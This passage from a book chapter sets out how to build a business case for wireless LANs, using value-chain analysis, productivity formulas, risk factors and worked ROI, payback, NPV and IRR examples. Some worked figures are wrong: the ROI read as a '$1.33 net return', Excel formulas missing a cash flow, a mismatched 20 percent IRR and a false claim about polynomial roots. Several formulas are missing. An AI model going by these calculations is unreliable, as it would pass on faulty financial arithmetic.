customer information, line busting, sales assist activities, and swift accessibility to product information
that ultimately enhances the customer's experience in terms of quality, accuracy, and promptness of
service. Furthermore, as the capability to transfer ever-greater volumes of data to mobile devices
increases, greater use can be made of multichannel web services delivery efforts.
Given the sensitivity of the information in the financial services industry, several challenges remain.
These include security, integrity of data, and system reliability. As WLAN technology continues to
mature, these challenges will be resolved, providing financial institutions with a robust and secure
alternative to or extension of the traditional wired infrastructures.
Secondary Activities
The previous section illustrates the differences among industries when it comes to identifying opportune
areas of application for WLANs. We first focused solely on the primary activities in the value chain, so it
is now time to take a closer look at the secondary activities.
Porter defines the secondary activities as being all activities that support the value-creating primary
activities of an organization. The details of the secondary activities are considered to be industry-specific
and they include organizational functions such as general management, planning, legal, accounting,
finance, human resources, research and development, and purchasing. This is exactly the environment
in which the knowledge worker operates.
Given the reliance of today's knowledge worker on information, it is not surprising that business
intelligence and business processes have become highly dependent on IT to increase worker
productivity, collaboration, and accuracy. WLANs provide the unprecedented opportunity to inject true
mobility into the information supply chain.
The benefits that WLANs offer to secondary activities are many and diverse. Some of the benefits include
the following:
Providing mobile data connectivity, thereby enabling workers to transparently roam among
different locations without being burdened with the concern of locating a free data port.
Facilitating collaboration by making ad-hoc meetings easier because laptop computers can freely
move around the office.
Enabling richer and more accurate communications sessions because information is untethered
from the desk (assuming the availability of mobile computing devices).
Provisioning connectivity to temporary locations or intermittently used spaces. Examples of
temporary locations include rapidly deployed new sites or disaster recovery facilities. Meeting
rooms and boardrooms are examples of sporadically used spaces.
Improving aesthetics of customer-facing locations or executive meeting rooms by precluding
dangling wires.
As you can see, the benefits of WLANs for secondary activities are mainly related to boosting
productivity and comfort of the knowledge worker by arming him or her with mobile access to rich media
content. Additional benefits, albeit of lesser extent, are associated with the ability to reduce capital
expenditures on communications equipment for temporary locations and occasionally used areas.
Finally, intangible benefits such as improved aesthetics are also enabled by WLANs.
Keeping these benefits in mind will help you identify specific secondary activity areas of your
organization where the targeted application of WLANs makes business sense. Note that the application is
not limited to a WLAN-only environmentit also includes the hybrid (wired and wireless) LAN. After you
have identified the primary and secondary activities of the organization that can most benefit from
WLANs, you are ready to tackle the next question.
Question 2: How Will a WLAN Positively Influence the Identified Areas?

As you've learned in this chapter, the benefits that a WLAN can provide are many and diverse. The
variety of benefits is related not only to the place of application in the organization's value chain but also
to the type of benefits.
One potential framework for analyzing the impact of WLANs in a given application area is to consider the
strategic, operational, financial, and technological dimensions. Breaking down the problem provides a
framework to help define the enabling capabilities of WLANs. However, given that the goal is developing
a robust WLAN business case, a different set of lenses is more conducive to structuring and presenting
an exhaustive justification for WLANs.
The following sections describe three such lensesquantitative factors, qualitative factors, and risksto
further analyze the WLAN benefits identified by the previous question.
Quantitative Factors
Quantitative factors are sometimes referred to as hard, tangible, or quantifiable benefits that can be
translated relatively easily into a dollar value. The realization of the financial benefits occurs through
direct cost reductions, indirect cost avoidance, and increased end-user productivity. Examples include
these:
Displacement of equipment costs through replacement of switches by APs

Reduction in cabling expenses
Avoidance of circuit expenditures when utilizing inter-building WLAN bridges
Employee productivity benefits because network access now follows the user, as opposed to the
opposite
Ability to connect to public WLAN infrastructure (cafes, hotels, and airports)
As mentioned earlier in the "Total Cost of Ownership" section, the TCO of WLAN-only or hybrid LANs is
typically two to three times higher than the wired-only equivalent. However, in situations where
connectivity needs to be provided to sporadically used spaces such as meeting rooms or executive
boardrooms, temporary locations, or locations where there is a high degree of variance in the number of
users requiring connectivity, the cost per end user of provisioning WLANs can be lower than connectivity
solutions with more expensive traditional enterprise LAN switches.
Similarly, WLANs provide an opportunity for a reduction in cabling costs. This does not, however, hold
true in all situations. Cabling infrastructure is typically depreciated over 10 years. As such, its annual
cost contribution tends to be relatively low. However, when temporary sites are required, the cabling
cannot be depreciated over such extended periods of time. In these cases, WLANs then provide a costeffective solution for providing connectivity, even though the expenses associated with the operation and
administration of WLANs might be higher. The same argument can be made for environments that
provide challenging, and hence costly, cabling situations.
The use of directional antennas enables the construction of inter-building WLAN bridges. This solution
can be used as an inexpensive means of interconnecting buildings that are separated by public
infrastructure and that would otherwise require the purchase of service provider-provisioned circuits.
The installation, subscription, and utilization fees associated with these circuits can thus be avoided.
Staff mobility and productivity enhancements are by far the largest benefits associated with WLANs as
increased productivity equates to avoided opportunity costs. The capability to remain connected to the
network, independent of one's physical location, eliminates the opportunity cost of not being able to
access online applications and information. Not only does this result in incremental amounts of
productive work that users can perform, but it also enables greater responsiveness and speed that these
users can bring to business processes.
You can approximate an approximation of the aggregate quantified productivity benefit that is enabled
by the WLAN with a two-step approach. First, you identify the total end-user base for which the benefit
is applicable. You then establish the monetary benefit for each end user. Multiplying both factors yields
the total productivity benefit for the organization.
You can determine the number of users who benefit from WLAN productivity enablement with the
following factors:
Total number of employees (total employees)
% of employees using computing devices (percent computing)
% of computing devices that are mobile (mobile computing)
% of mobile devices that will employ WLAN (WLAN mobile)

Multiply these factors to determine the total number of WLAN-enabled users who can benefit from
increased productivity:
(Total WLAN beneficiaries) = (total employees) x (percent computing) x (mobile computing) x
(WLAN mobile)
Note
The number of total WLAN beneficiaries should be in accordance with the number of users who
will effectively be covered by the physical footprint of your WLAN. Indeed, if your WLAN is
deployed in site A, but all the potential users are in site B, no productivity benefits will be
realized.
The next step is to determine the monetary value of the productivity benefits. This value is determined
by considering the fully loaded cost of an average user who uses the WLAN and identifying how much
time is converted from unproductive (that is, no network access) to productive (that is, with network
access). This calculation, of course, assumes that the unavailability of network access is the reason for
the user not being productive.
The rationale for allocating a monetary benefit is based on the following: If we assume that end users
require access to online information to perform their tasks, then the time during which this information is
unavailable is an entirely sunk costthat is, during this time, the end user is in effect not contributing to
the value-creation process of the organization. However, the loaded cost of the employee continues to
accrue and hence there is a direct ongoing expense associated with the person's time.
A prime example can be found in meetings. Meetings are a part of everyday organizational life.
Individuals need to come together to resolve challenges collectively and collaboratively. Participants
rarely arrive at the gathering place at the same time, or even on time. Several minutes are thus spent
waiting for others before commencing the actual meeting. Even though one can argue that this waiting
time is an opportune time for socializing with colleagues, more often than not, some more urgent matter
needs attention. The ability to retain network connectivity can thus transform this otherwise idle time
into value-creating time. The sunk cost of the organizational resource is now counterbalanced by a
positive contribution. Thus, increasing employee productivity translates into reducing or altogether
eliminating the sunk cost of idle time.
A similar example can be found in the healthcare industry. By providing physicians with the information
that they require at the point of care, the necessity to shuttle between the patient and the information
terminal is avoided. The sunk cost of the caretaker's salary expense is offset by the value creation of
taking care of patients.
Ideally, it would be great if you could quantify the exact monetary benefit of the value-creation process.
A very accurate picture could then be developed in terms of the net contribution. However, because this
quantification is next to impossible to achieve, we approximate the productivity benefit through the
conversion of downtime into time spent on the primary and secondary activities of the organization. The
productivity benefit enabled by WLANs is thus represented by the total reduction in sunk cost associated
with non-value-contributing activities of staff because of unavailability of network access.
You can determine the monetized productivity benefit per WLAN user with the following factors:
Fully loaded annual cost of WLAN user (loaded employee cost)
Business days per year (busday per year)
Hours per business day (hours per busday)
Minutes per hour (min per hour)
Minutes per day of downtime converted (min converted)
The daily sunk cost per staff member that is avoided by conversion of unproductive time into valuecreating time is calculated by multiplication of the these factors:
Note
Note that the first four factorsfully loaded annual cost of WLAN user, business days per year,
hours per business day, and minutes per hourare straightforward to determine. The annual
loaded cost of a staff member includes salary, benefits, furniture, and equipment required by
the worker, allocated expense, and so on. The Human Resources department should be able to
provide an estimate of the loaded cost of a staff member.
Typical values that would be used for the number of business days in a year would be 220 or 240. The
variation can be explained by the fact that the number of holidays and vacation days varies from one
place to another. Similarly, a typical value for the number of business hours per day would be eight,
although local variations do exist.
The number of minutes of downtime per end user that is converted into productive time by the WLAN is
also the trickiest factor because it is the factor that can exhibit the highest degree of variance and hence
have the biggest influence on the final outcome.
One of the options to quantify this number is to select an arbitrary, albeit conservative, number that will
pass the reviewers' "sniff test." For example, few people are likely to object to a number such as 5 or 10
minutes a day of useful network connectivity. On the other hand, making the assumption that an end
user will benefit from 60 minutes of increased productivity a day is likely to be rejected. If there would
be no objection to 60 minutes, something else is seriously awry, and we would suggest that resolving
this challenge should take priority over determining the viability of WLANs for your organization.
A second, and more accurate, option for determining the number of incremental productive minutes is
through sampling. In statistics, the Law of Large Numbers states that the average of a random sample
from a large population is likely to be close to the mean of the whole population. When combined with
the Central Limit Theorem, which states that sampling distribution approaches the normal distribution
independent of the underlying distribution of random variables, statistical sampling becomes a practical
method for determining a robust estimate of the number of minutes that a member of the organization
can convert into productive time because of the WLAN.
Fortunately, the Central Limit Theorem converges rather quickly, and a sample size of 30 or more results
is a good estimate for the population mean. As such, a simple survey can be constructed in which users
are asked for an estimated number of minutes per day they would be online (and hence assumed
productive) with availability of a WLAN. Performing the survey on a population sample size of 30 or more
will yield a relatively accurate organizational mean.
Note
No information about the skewness of the population distribution around the mean should be
extracted from the sample.
After you have determined the number of users whose productivity can benefit from WLANs and the
daily productivity benefit captured by these users, the daily organizational productivity benefit is
computed by multiplying the two factors, as follows:
Daily WLAN-enabled organizational productivity benefit = (Total WLAN beneficiaries) x (Daily staff
productivity benefit)
You can then calculate the annualized benefit by multiplying the daily benefit by the number of business
days per annumthat is, by the factor busday per year.
Lastly, an indirect tangible effect of providing WLAN connectivity to the user is that it implicitly creates
the capability to connect to public WLAN infrastructures. This can be considered a synergistic effect of
deploying WLANs. Public WLANs denote those wireless networks that are made available to the general
public. Today, they can be found in cafes, airports, hotels, and even WLAN-enabled airplanes.
Road warriors or staff members who travel frequently can be provided with connectivity to the intranet
across this public infrastructure when armed with the necessary remote access tools. Virtual Private
Networks (VPN) create the possibility to construct secure tunnels across the Internet. This enables the
organization's private network to be extended in a secure and transparent fashion across public
networks, thus effectively providing full access to office applications. E-mail, intranet websites, and the
full suite of online applications become accessible.
Note
The IT security implications for providing such remote access are considerable. Chapter 7
covers tools and methodologies for securing such environments.
As such, a similar reasoning is applicable as the one employed for determining the benefit of providing
WLANs inside the organizational boundary. Time that would otherwise be spent idle can now be
converted into time spent on primary and secondary organizational activities. For example, waiting in an
airport lounge can be combined with reviewing and responding to corporate e-mail. Alternatively, time
spent at a coffee shop before a client meeting can be used to examine updates on the competition that
have been posted to the internal website.
The same algorithm can be employed for quantifying this productivity benefit. The first step is to
determine the number of users who have a roaming profile. Subsequently, the benefit per user needs to
be determined. We recommend determining the monthly (versus daily) benefit and annualizing it later
because it is rather difficult to determine the number of minutes a day that can be converted into
productive time by using public WLANs. This difficulty results from the distributed nature of travel
requirements. Identifying the number of minutes per month, however, should be easier.
As before, there are two options for determining the average monthly benefit per user. The first option is
to select an arbitrary, yet conservative, number that will pass a sniff test. For example, 30 minutes per
month saved is likely to be a realistic and conservative estimate. The second option is to perform a
survey of 30 or more frequent travelers. The result can then readily be converted into minutes of
savings per day as follows:
The formulas to be used in the computation are almost identical to those used for calculating the benefit
of the nontraveling users. An additional factor is used to determine the number of WLAN users who also
travelthat is, traveling WLAN user. This yields the following formula for determining the total number of
traveling staff members who can benefit from increased productivity while on the road:
(Total traveling WLAN beneficiaries) = (total employees) x (percent computing) x (mobile
computing) x (WLAN mobile) x (traveling WLAN user)
The monetary productivity benefit per traveling WLAN user thus becomes
Finally, the total daily organizational benefit of converted traveling idle time is
Daily WLAN-enabled traveling productivity benefit = (Total traveling WLAN beneficiarie)s x
(Traveling staff productivity benefit)
After you have determined all the parameters that contribute monetary benefits, simple summation
yields the aggregate annualized monetary benefit that can be extracted from the WLAN solution. The
total quantifiable benefit thus becomes
Displacement of equipment costs (incl. CAPX, one-time, and recurring OPEX)
Reduction of cabling expenses
Avoidance of circuit expenditures
Office employee productivity benefits
Traveling employee productivity benefits
TOTAL BENEFIT
Qualitative Factors
Qualitative benefits are often referred to as soft or intangible benefits. Even though these benefits are
typically exceedingly hard to convert into a monetary value, they are still valuable to an organization.
Indeed, decisions are often made to pursue initiatives based on strategic drivers. Examples of strategic
initiatives include programs that intend to increase customer satisfaction, reduce customer churn, or
provide the organization with enhanced scaling capabilities to support mergers and acquisitions (M&A)driven or organic growth.
Earlier in this chapter, we considered the example of Starbucks, which decided to provide WLAN
connectivity in its coffee shops. The rationale for this project was to enhance the customer's experience
and hence boost customer satisfaction. This increases customer loyalty, which results in more repeat
business. In addition, because customers now have Internet access, the average stay becomes longer
and potentially leads to more servings per customer.
The primary goal of the majority of strategic initiatives is to either increase revenues or reduce costs.
The linkage between such programs and WLANs is often too complex and too long to permit easy
quantification. In the Starbucks example, this translates into determining the effect of WLANs on the
creation of repeat business and growing the number of servings per customer.
Even though this value could, in theory, be determined through market studies and surveys, this
calculation is rarely done in practice. Stakeholders make a qualitative assessment and rely on sound
business judgment to find the balance between risks and rewards.
That said, an exhaustive business case does demand that all dimensions are considered, and it is
relatively hard to tell which of the benefits (that is, hard or soft) will have the greatest impact on the
organization. Hence, we strongly recommend that the soft benefits be analyzed, documented, and
included in the WLAN business case to minimize the risk of oversight and to maximize the business
case's credibility and impact.
Risks
Risks are a part of everyday life. They come in all forms, shapes, and sizes. Entire industries revolve
around the management, mitigation, and transfer of risk. The insurance industry is built upon the
transfer of risk. The financial services industry is rife with instruments whose purpose is the
management and transfer of risk.
This section intends to provide a brief overview of the risks associated with WLANs and what can be
done to mitigate, reduce, or transfer them. The goal is to arm you with an awareness of the various
types of risks so that you can not only proactively address them in your business case but also develop a
holistic framework for dealing with them. Chapter 7 is dedicated to one type of riskthe risk of IT security
in the WLAN ecosystem, and Chapter 8, "Management Strategies for Wireless LANs," covers operational
risks as well as strategies and tools for managing this type of risk.
Risk is a double-edged sword. Whenever you introduce a new technology into an environment, you lower
one set of risks while increasing or introducing another set of risks. In the case of WLANs, examples of
risks that are reduced include the unavailability of network connectivity and incapacity to support mobile
applications. Examples of risks that are introduced or increased consist of additional equipment that
needs to be deployed (execution risk) and managed (operational risk) and additional IT security risk
because WLANs provide a new vehicle for disruption, loss, or damage.
Awareness of a problem is the first step toward resolving it. As with any other technology, WLANs carry
a diverse set of risks that span the entire lifecycle of the solution. Identification of these risks and what
will be done to address them and inclusion of this information in the business justification is paramount
to creating a balanced and credible basis for deciding whether to pursue the deployment of WLANs in the
organization.
Figure 2-12 illustrates the organization's vector in the three-dimensional space created by the tangible
benefits, the intangible benefits, and the risks. The depiction not only summarizes the relative sizes of
the benefits and risks but also creates the possibility to display a sensitivity boundary. Because many of
the benefits and risks are based on subjective assessments, variance needs to be included to
accommodate the uncertainty surrounding the parameters. As such, the illustration forms a summarizing
scorecard for how much the organization can benefit from WLANs.
Figure 2-12. Organizational Positioning in Benefit and Risk Dimensions
Upon completion of the identification and analysis of the costs, benefits, and risk components, you can
tackle the next step of constructing the WLAN cost justification.
Cost-Justification Analysis
When it comes to business decision metrics, everybody is looking for the one tell-all metric. This silver
bullet will not only precisely measure the value of your investment but also allow maximization thereof.
However, just as there is no single metric for corporate performance or for the state of the economy,
there is no single measure to assess IT investments and performance. A collection of measurements and
assessments is required to form a relevant and accurate snapshot or projection of the performance of IT
investments.
Before delving further into the quantitative ramifications of WLANs, you need to understand the position
of WLANs in the IT value chain so that you can place the benefits of WLANs in a more appropriate
context.
WLANs form an integral part of today's IT transport portfolio. These assets exist to move information
from a point of origin to a point of consumption. The challenge that you face when evaluating the value
of such assets is that these types of assets are located at the bottom of the IT hierarchy. You can think
of this hierarchy as conceptually similar to the hierarchy of human needs developed by Abraham
Maslow, one of the founders of humanistic psychology, in the 1940s. Maslow posited that human beings
employ a hierarchy when it comes to fulfilling their needs. The precondition for fulfilling higher-order
needs is that lower-order, more basic needs must be met first, as shown in Figure 2-13.
Figure 2-13. Maslow's Hierarchy of Human Needs
Maslow's model begins with the fulfillment of physiological needs, such as thirst, hunger, and other basic
needs. After physiological needs are met, humans seek to satisfy needs involving physical safety, such
as protection from bodily harm. After safety is obtained, Maslow then conjectured that humans act to
fulfill their needs for belonging and affection. The next stage in the model is the need for esteem, which
includes self-esteem, respect, and recognition. The final phase that humans seek to realize is the need
for self-actualization. This includes such things as self-fulfillment and job satisfaction.
Fulfillment of each level is sequential in nature, suggesting an intrinsic need to satisfy the more basic
needs before moving to the next level. Maslow's hierarchy of needs is a classic model in human
behavior. But why is this conceptual model relevant to the IT space? Maslow's concept can readily be
mapped to the corporate or institutional ecosystem. Figure 2-14 illustrates this high-level mapping.
Figure 2-14. Hierarchy of Organizational Needs

The basic needs to be fulfilled for any organization include the availability of basic infrastructure. This
refers to fundamentals such as power, transportation, and water from a public infrastructure point of
view; parking space and physical security from a site perspective; power, structural integrity, and air
conditioning for buildings; and finally items such as rack space, fire control, and access security for data
centers. Figure 2-14 refers to these components as basic infrastructure.
Only after the requirements for basic infrastructure have been met can attention be turned to identifying
the necessities in terms of IT infrastructure. This includes both hardware and software. Examples of
hardware include the full range of IT transport, compute, and storage assetsthat is, network devices,
servers, clients, and storage arrays. Software includes middleware, operating systems, and database
systems that provide the intelligence to manage the hardware and raw information. No meaning is
associated with the information at this level in the hierarchy. That is the responsibility of the next level.
The next stage in the model is the need to provide meaning to the information. This is achieved through
applications. As the raw information is moved, transformed, and stored, different applications enable the
attribution of semantics. The information now takes on such heterogeneous forms as a phone call, a
video session, an e-mail, or a purchase order.
The information presented by the various applications is in turn used by a variety of organizational
processes that the organization engages in while performing the primary and secondary activities. The
organizational processes provide the ecosystem intelligence that allows the organization to sense and
respond to changes in its internal and external environment. Finally, armed with this ecosystem
intelligence, the organization can pursue its primary goal, which is the creation of value.
This hierarchy is relevant within the context of developing an ROI or cost justification for wireless
networks because of the enabling character of WLANs. That is, the majority of benefits that WLANs
create is not on the same level in the organizational hierarchy. The hierarchy enables you to make this
intra-level relationship between WLAN costs and organizational benefits explicit.
For some types of assets, there is a direct relationship between the costs associated with the asset and
the benefits that can be extracted. Consider, for example, manufacturing equipment. The TCO of this
equipment includes all costs associated with the purchase, installation, and operation of the equipment.
Examples of benefits could include an increase in production velocity (such as more widgets per minute)
or a decrease in cost of goods sold (COGS) as raw materials are used more efficiently. One could
postulate that the costs and benefits are at the same level in the hierarchy of organizational needs. The
benefits are in essence direct.
Now consider WLANs. The main benefits of WLANs can be derived from their enabling character. They
enable mobility of staff and applications, which translates into increased productivity. In some cases,
WLANs translate into lower cabling or equipment expenses. However, this is more the exception than the
rule because the operational cost is typically higher than for wired LANs. Hence, we find that the costs
are at one level of the hierarchy, while the benefits are located at a higher level. The benefits are
indirect.
A good analogy can be found in electrical wiring. The cost tied to the acquisition and installation of
electrical power is relatively straightforward to determine. However, the quantitative benefit is next to
impossible to compute. Indeed, electrical power is an enabler. At home, it permits the use of electrical
appliances such as televisions, dishwashers, and vacuum cleaners. In an organization, it allows the use
of lighting and computers. As such, electricity has an enabling character because the benefits that it
enables are higher up the hierarchy of needs. The same is true for WLANs.
The hierarchy of organizational needs is important for two distinct reasons in the construction of WLAN
cost justifications. First, it provides a framework for defining the boundary of what must and what can be
included in the analysis. You can include benefits that are higher up the hierarchy either in a quantified
form as demonstrated earlier for staff-member productivity or in a qualified form as was the case for
increasing customer satisfaction.
Second, the framework explains the linkage between the WLAN and its application points. As one moves
higher up the hierarchy, it is implicit that the quantified benefits become more abstract. They are also
characterized by an ever-greater degree of subjectivity. However, after the linkage becomes clear, a
higher degree of comfort with the benefits included in the cost justification should result.
After you have defined which benefits are to be included in the organizational justification of WLANs, it is
time to consolidate the cash flows of the identified costs and benefits into metrics that are meaningful to
the decision makers. Because these metrics reflect absolute monetary terms, the benefits included are
limited to those that have thus far been quantified.
The following are the standard metrics for evaluating cash flows associated with costs and benefits:
ROI The average expected cash flow over the period of the project divided by the initial investment
outlay. ROI provides a satisfactory method of evaluating an investment over a short period of time.
ROI does not take into account the time value of money.
Payback period The period required to recover the initial investment of the project. This method
of evaluating an investment does not consider all cash flows and does not discount the cash flow.
This method might not be appropriate for evaluating an investment over an extended period of
time.
Net Present Value (NPV) The Present Value (PV) reflects what a future sum of money is worth
today, given a particular rate of return (and inflation). NPV expresses the net value of costs and
benefits in today's monetary terms that is created or destroyed by an investment. It is computed
by taking the PV of the expected future cash flow of an investment and subtracting the initial
investment cost. Alternatively, the NPV can be determined by subtracting the PV of all cash flows
related to costs from the PV of all cash flows from benefits.
Internal Rate of Return (IRR) The interest rate that equates the PV of the expected future cash
flow to the initial investment outlay, where the NPV is equal to zero.
The next sections take a closer look at each metric by using a numerical example. The sample cash flows
shown in Table 2-2 are for illustrative purposes only and are not based on actual WLAN cases.
Table 2-2. Sample 5-Year Cash Flows of WLAN Investment

Year 0
Year
1
Year
2
Year
3
Year
4
Year
5
5-Year Total
Total Costs
$500
$200
$200
$200
$200
$200
$1500
Total Benefits
$0
$400
$400
$400
$400
$400
$2000
Net Benefit
($500)[*] $200
$200
$200
$200
$200
$500
[*]
Parentheses denote a negative value
Return on Investment
The ROI is a key indicator of an investment's value. It expresses the relative total gain of the project
compared to the total cost. Its computation is very straightforward and is performed by dividing the
cumulative expected benefit by the cumulative cost over the analysis period of the WLAN project. The
ROI formula is as follows:
ROI = Total cumulative benefit / Total cumulative cost
The formula yields the expected net return on every monetary unit spent. For the cash flow example in
Table 2-2, the ROI is this:
ROI = $2000 / $1500 = 133 percent

In other words, for every dollar spent, there is a net return of $1.33.
The simplicity of the ROI calculation is its strength. It generates an easy-to-comprehend ratio. However,
it has two considerable drawbacks. First, ROI does not consider the time value of money. The golden
rule in finance is that a dollar today is worth more than a dollar tomorrow. This is because cash can
accrue interest in a risk-free fashion over time when invested in a risk-free instrument such as U.S.
treasury bonds. Additionally, there is the requirement for investing the cash in a risk-free instrument
because cash hidden under the mattress does not accrue interest.
Note
This reasoning assumes that the probability of default of the U.S. government is zero. Let us
plainly accept that assumption.
Hence, future cash flows should be adjusted in value to reflect their true value today. These future
outgoing or incoming cash flows should in effect be discounted. The later section "Net Present Value"
delves deeper into this topic. Because ROI does not consider the time value of money, it tends to
overestimate the return generated by the investment because the nominal future cash flows are inflated
in real terms.
A second drawback is that ROI masks the relative sizes of the cumulative cash flows. An investment of
$100,000 that returns $133,000 has an ROI of 133 percent. Compare this to an investment of
$100,000,000 that yields a monetary benefit of $133,000,000. Yet again, we find an ROI of 133 percent.
It is clear, however, that very different considerations will be made in the latter case. The absolute size
of the investment will result in unlike deliberations about risks and will drive very different decision
criteria.
Payback Period
Another calculation that is easy to understand is the payback period. The payback period defines the
breakeven point of a project and is typically quoted in months. The timer is started at the beginning of
the project, and it is stopped when the cumulative benefits exceed the cumulative costs.
For the example mentioned in Table 2-2, the payback period results are shown in Table 2-3.
Table 2-3. Payback Period Results

Payback Period
Year
0
Year
1
Year
2
Year
3
Year
4
Year
5
Cumulative costs
$500
$700
$900
$1100 $1300 $1500
Payback Period
Year
0
Year
1
Year
2
Year
3
Year
4
Year
5
Cumulative benefits
$0
$400
$800
$1200 $1600 $2000
Figure 2-15 illustrates the breakeven point of costs versus benefits.
Figure 2-15. Identifying the Payback Period
Table 2-3 illustrates that the breakeven point should occur at some point after year 2. If you assume a
linear distribution of costs and benefits on an annual basis, you can compute the exact point of
intersection.
The line section depicting the cumulative costs between year 2 and year 3 goes through the points with
coordinates of (year, cost), which in this case is (2, 900) and (3, 1100). As such, the line is represented
by the equation:
(X 2) / (3 2) = (Y 900) / (1100 900)
or
Y = 200 x X + 500
Note
The function that describes a line that goes through coordinates (a1,b1) and (a2,b2) is
constructed as follows:
Similarly, the line depicting the cumulative benefits that goes through the coordinates (2, 800) and (3,
1200) is represented by the equation:
(X 2) / (3 2) = (Y 800) / (1200 800)
or
Y = 400 x x
Solving both equations for X results in this:
400 x X = 200 x X + 500
or
X = 2.5 (years)
Multiplying X by 12 results in the number of months for the payback period, which is 30 months for this
example.
Payback period is important because it measures the duration to the point that the investment starts
generating positive cash flow. The further out in time this breakeven point is, the more risky the project
should typically be considered.
Finally, payback period has its drawback in that it communicates nothing about the return size. It only
measures the time to a positive return.
Net Present Value

The "Return on Investment" section introduced the time value of money concept. This concept is based
on the fact that cash that is invested today will increase in value by some future date through the
accrual of interest. Because of this accrual of interestand interest on interesta cash flow today is worth
more than the same cash flow in the future. The idea is that you can invest the cash that you receive
today and accrue interest on it. If you receive the same principal amount in the future, you have the
opportunity cost of the interest that you miss out on. Hence, cash today is worth more than the same
amount of cash tomorrow. The exact amount by which these cash flows differ depends on two
parameters:
The interest rate, which shall be further discussed shortly
The number of compounding periods
Interest in its turn accrues interest with time, and hence there is a compounding effect.
The discounting of future cash flows to their PV enables the direct comparison of present and future cash
flows. The cash flows have been normalized in time to represent today's value in monetary terms. NPV
refers to the fact that the PV of all outgoing cash flowsthat is the PV of the costsis subtracted from the
PV of the incoming cash flowsthat is the PV of the benefits. The result is the "net" value today.
To determine the PV of a future cash flow, identify the exact time of the cash flow so that the correct
number of compounding periods can be established. Next, select the right discount rate.
One option for selecting the discount rate is to set it equal to the interest rate that could be earned
elsewhere by investing the cash. Depending on risk averseness, the cash could be invested in risk-free
U.S. government bonds, stocks, or complex instruments such as derivates. Each of these instruments
yields a particular interest rate that is related to the degree of risk associated with it. Because the cash
spent on the project will not be invested in other instruments, it creates an opportunity cost. The
interest rate of this opportunity cost is the basis for the discount rate.
Alternatively, the discount rate can be set to the Weighted Average Cost of Capital (WACC) of the
organization. The WACC reflects how much it costs your organization to borrow money over time. It is a
function of many different factors, including the risk free rate, the organization's cost of debt, the cost of
equity, the capital structure (debt/equity ratio), and the tax rate. We suggest that you ask your finance
department to provide you with the WACC for your organization.
Either the interest rate of the opportunity cost or a risk-adjusted discount rate can be used as the PV
discount rate for the future cash flows. Given that higher discount rates result in smaller PVs, the
discount rate can be biased upward or downward to modify the project's risk profile. Higher discount
rates should be employed for riskier projects, whereas lower discount rates are more appropriate for less
risky initiatives.
The formula to compute the PV of a cash flow that occurs in year m, given a discount rate of r, is this:
The present value of a series of annual cash flows that start in year 0 and end in year n is computed,
assuming the discount rate r, as this:
The formula can be applied to our example to compute the NPV in two different ways. Either the PV of
the cash flows of the costs can be subtracted from the PV of the cash flows of the benefits, or the PV of
the net annual benefits can be computed. For this example, we assume a discount rate of 10 percent.
The calculation of the PV of the net annual benefits is shown in Table 2-4.
Table 2-4. Present Values of Sample 5-Year Cash
Flows of WLAN Investment

(In thousands)
Year
0
Total Costs [*]
($500) ($200) ($200) ($200) ($200) ($200)
PV (Costs)
($500) ($182) ($165) ($150) ($137) ($124)
Total Benefits
$0
$400
$400
$400
$400
$400
PV (Benefits)
$0
$364
$331
$301
$273
$248
Net Benefit
($500) $200
$200
$200
$200
$200
PV (Net Benefit)
($500) $182
$165
$150
$137
$124
[*]
Year
1
Year
2
Year
3
Year
4
Year
5
All totals are in thousands
Compare the nominal cash flows represented in Figure 2-16 with the PV of these respective cash flows
illustrated in Figure 2-17. The impact of compounded discounting can clearly be seen in that it decreases
PV of cash flows that are further out in time.
Figure 2-16. Nominal Annual Cash Flows
Figure 2-17. Present Value of Annual Cash Flows
Application of the formula to the net benefits of our example yields the following:
Note
Fortunately, Microsoft Excel provides a built-in function for NPV computation. The function is
named NPV and takes the discount rate and cash flows as inputs. It should be noted that the
cash flows used in the formula start in year 1, not year 0. Hence, when calculating the NPV,
you need to add the cash flow of year 0 to the result of the function. For our example, the
Excel formula becomes
Net_Present_Value = 500 + NPV (10%, 200, 200, 200, 200)
The Excel NPV function takes discrete values, cell names, or cell ranges as inputs.
Because the Net Present Value computation increases the effect of current cash flows and decreases the
impact of future costs and benefits, the following general conclusions can be drawn:
Projects with low initial expenses and higher initial benefits generate higher NPVs.
Projects with high initial expenses and benefits that increase over time produce lower NPVs.
Determining the NPV of a project is an often-used and accurate method for determining the financial
viability of the project. The use of an appropriate discount rate not only ensures that some degree of risk
is accounted for but also generates a quantified metric in today's monetary terms of the net expected
gain.
However, NPV is not perfect. One of the pitfalls is that projects that generate enormous savings far in
the futurecash flows of benefits look like a hockey stickwill result in NPVs that are substantial. You
should remain aware of the simple fact that the further out in time you project, the more uncertainty is
associated with the projection. The use of a constant discount rate cannot capture this issue. One
potential remedy would be to use variable discount rates with higher discount rates further out in the
future to accommodate for the additional uncertainty. Hence, you should consider not only the NPV but
also the profile of the cash flows to identify whether a project that is financially attractive in NPV terms is
nonetheless too risky.
Internal Rate of Return

The IRR calculation looks at the current and future net cash flows from a proposed project and
determines an interest rate such that the NPV of the project becomes zero. The rate should be thought
of as the interest rate that another investment would have to exceed to become more interesting than
the project under consideration.
In mathematical terms, the IRR is the discount rate that makes the NPV equal to zero. The formula
becomes
The cash flows are given, and the discount rate r needs to be computed. Given the fact that zeros of
fourth and higher-order polynomials cannot be determined algorithmically, they need to be
approximated using computer programs that perform iterative approximations. These programs guess
values and perform continuous refinements until the equation results in zero or a number very close to
zero.
Note
Microsoft Excel has a built-in function for computing IRR. Not surprisingly, the function's name
is IRR, and its parameters are the cash flows starting with year 0. For our example, the Excel
formula becomes
IRR = IRR (-500, 200, 200, 200, 200)
The Excel IRR function takes discrete values, cell names, or cell ranges as inputs.
For the sample cash flows, the discount rate (that is, the IRR) that results in an NPV of zero is 20
percent.
As is the case for the other metrics, IRR has its weakness. Similar to ROI, IRR does not provide
information on the absolute value in monetary terms of the benefit generated by a project. A project
with an NPV of $1,000,000 can have an IRR of 29 percent, as can a project with an NPV of $258.
Summary
Today's environment is characterized by an increased degree of financial scrutiny and accountability. The
necessity for a holistic and robust business case is more dominant than ever before. As such, an
exhaustive understanding and assessment of all the costs, benefits, and risks associated with WLAN
deployments lies on the critical path to successfully using WLANs in your organizational ecosystem.
Business leadership is not limited to cost control. Strategic drivers such as increasing customer
satisfaction or decreasing customer churn drive the top line. Increasing or sustaining the top line is at
least as important as reductions in operating expenses.
This chapter focused on the strategic, tactical, and financial business considerations when evaluating
WLAN solutions for your institution. It introduced you to methodologies and frameworks that facilitate
the process of business-technology alignment and the identification of key application areas of WLANs
